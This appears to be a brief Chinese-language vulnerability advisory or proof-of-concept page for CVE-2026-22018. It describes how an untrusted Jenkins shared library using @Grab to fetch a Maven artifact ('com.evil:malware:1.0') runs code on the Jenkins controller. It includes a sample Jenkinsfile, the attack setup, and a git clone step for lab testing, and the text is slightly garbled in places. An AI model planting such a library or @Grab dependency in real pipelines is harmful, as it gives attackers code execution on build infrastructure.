
@Grab 的 Jenkins Pipeline 共享库代码执行// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
evilStep()
}
Jenkins 流水线从并非完全可信的源加载共享库。该库使用 @Grab 注解下载外部 Maven 构件,其中可能包含恶意类,在 Groovy 编译期间于 Jenkins 控制器上执行代码。
@Grab 注解在运行时获取并加载任意 JAR;共享库未经过沙箱隔离。配置一条使用不受信任库的流水线,该库的 vars/evilStep.groovy 中包含 @Grab('com.evil:malware:1.0')。当流水线运行时,恶意 JAR 的静态初始化器会执行。
@Grab。git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.